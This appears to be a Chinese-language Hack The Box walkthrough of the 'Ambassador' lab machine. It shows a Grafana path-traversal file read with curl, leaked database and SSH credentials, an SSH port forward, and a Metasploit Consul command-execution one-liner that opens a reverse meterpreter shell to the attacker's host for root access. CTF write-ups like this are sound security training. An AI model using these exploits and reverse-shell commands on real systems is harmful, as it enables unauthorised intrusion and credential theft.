Hack The Box靶机——Ambassador
文章目录
- 前言
- 一、Web部分
- 二、提权部分
前言
难度:中等,Hack The Box网站在线靶机。本文涉及知识点有:Grafana系统任意文件读取,CURL下载文件,SSL本地端口转发,Consul命令执行。
靶机地址:10.10.11.183
kali地址:10.10.14.26
一、Web部分
1)选择active machines页面的medium难度,选择第一个Ambassador靶机。
2)由于是靶机直接就全端口扫描了,同时Fscan先扫一下看看。发现存在22端口说明是Linux主机。存在80端口、3000端口是Grafana系统,还有3306端口。
nmap -T4 -p- 10.10.11.183
3)Fscan结果是SSH和MySQL都不存在弱口令。
./fscan_amd64 -h 10.10.11.183
4)访问3000端口发现是Grafana系统,先尝试下弱口令失败,查找历史漏洞,发现任意文件读取漏洞,但是利用失败了。
5)在看一眼3306端口+phpMyAdmin,乱码但是大概能判断操作系统版本。
6)访问80端口:http://10.10.11.183/,提示是说使用开发人员帐户进行SSH,DevOps将为您提供密码。没懂先放着吧!
7)进行目录扫描,也没发现什么有效信息。
8)陷入 僵局,再次不死心的尝试下grafana的漏洞,这次利用searchexploit查询。搜索grafana,然后选择任意文件读取的payload拷贝到当前桌面上,然后使用,然后就好使了!!!
searchsploit grafanasearchsploit -m multiple/webapps/50581.pypython3 50581.py -H http://10.10.11.183:3000
9)任意文件读取先读取配置文件,谷歌搜索发现配置文件为:/etc/grafana/grafana.ini
10)数据量太多了我们直接下载下来看。
curl --path-as-is http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
11)根据 grafana.ini 文件中的提示:mysql、postgres、sqlite3都可以打开,我们用sqlite3打开,成功找出MySQL数据库的账号和凭证:grafana/dontStandSoCloseToMe63221!
12)连接数据库后查看下当前用户,找到账号密码为:developer/anEnglishManInNewYork027468。
13)按照80端口页面的提示,使用账号密码登录SSH服务器。
二、提权部分
1)可以看出来是无法利用内核版本提权了。
2)也无法利用sudo提权和suid提权。
sudoedit -s /find / -user root -perm -4000 -print 2>/dev/null
3)无法利用计划任务提权,还有其他的等等。
4)常规目录查看tmp opt等等,在opt中存在两个文件夹其中my-app文件家中存在git文件,可以查看git日志,发现正在运行一个consul的服务,不懂百度之。
5)发现存在远程命令执行漏洞并且MSF上就有,然后各种利用失败。
6)查找原因,报错是说连接cosul API的时候出错了,查找资料后发现是因为没有8500端口,直接用SSL做一个本地端口转发,将靶机的8500端口转发到本地8500端口。
ssh -L 8500:0.0.0.0:8500 developer@10.10.11.183 #然后输入密码
7)然后利用MSF直接反弹shell,权限为root权限。
msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost 10.10.14.26; # 此处的acl_token在第4段的第二张图最下方set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 4444; exploit"
Hack The Box靶机——Ambassador相关推荐
- Hack the box靶机 October
搜了一下october 有漏洞 然后默认的后台是/backend 试了一下密码admin:admin 竟然进去了???? 有文件上传功能 shel.php 抓包 改成*.php5 右侧click he ...
- Hack the box靶机 Admirer
不能访问啊 wfuzz一下 wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,txt-php-html -u ...
- Hack the box靶机 Grandpa
migrate进程迁移 win的题怎么都是用msf做的呢 看大佬们没有不用msf的
- Hack the box靶机 Chatterbox
修改地址 把生成的字符串替换python里的
- Hack the box靶机 Soli
突破口是oracle 就是真的慢 我快吐了 scott/tiger 不知道为什么老是连接不上 给我整不会了 但是我重启了一下 换了一个端口 然后就好了
- Hack The Box——Traverxec
目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 内核提权 SUID提权 总结 简介 这个靶机还算比较简单,只需一步一步慢慢走下去就可以完成了.漏洞发现和利用都比较简单,使用已知漏洞可以直接获得we ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限
Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...
- Hack The Box - Starting Point - TIER 0
Hack The Box - Starting Point - TIER 0 Meow TASK 1 What does the acronym VM stand for? 首字母缩略词 VM 代表什 ...
最新文章
- java.lang.OutOfMemoryError: Java heap space错误及...
- linux 内核 链表 list_head 使用方法
- 【译文】Web Farm和Web Garden的区别?
- InfluxDB中文文档
- git add后取消_Python 命令行之旅:使用 click 实现 git 命令
- 俄罗斯博士用树莓派自制灭蚊武器!
- 针对不同pandas版本进行列名的修改
- 【物流推荐】HEGERLS堆垛机—自动化立体仓库中最重要的起重运输设备
- Oracle执行计划变更
- NCA9555/PCA9555代码 通用总线IO扩展器芯片驱动
- Win10 中主机名hosts 文件位置
- 如何打开计算机本地组策略编辑器
- 3G UMTS与4G LTE核心网(二):4G网络概述
- Linux-Shell脚本练习
- Shell监控jvm发短信
- 程序员经常看的开源月刊《HelloGitHub》第 56 期
- 空间数据与空间分析不确定性原理——学习笔记(1)
- 虚拟化之Proxmox VE安装教程
- RDMA入门——RDMA学习笔记(一)
- CREO:CREO软件之草绘【草绘】之设置、获取数据、操作、基准、草绘、编辑、约束、尺寸、检查、构造模式的使用方法之详细攻略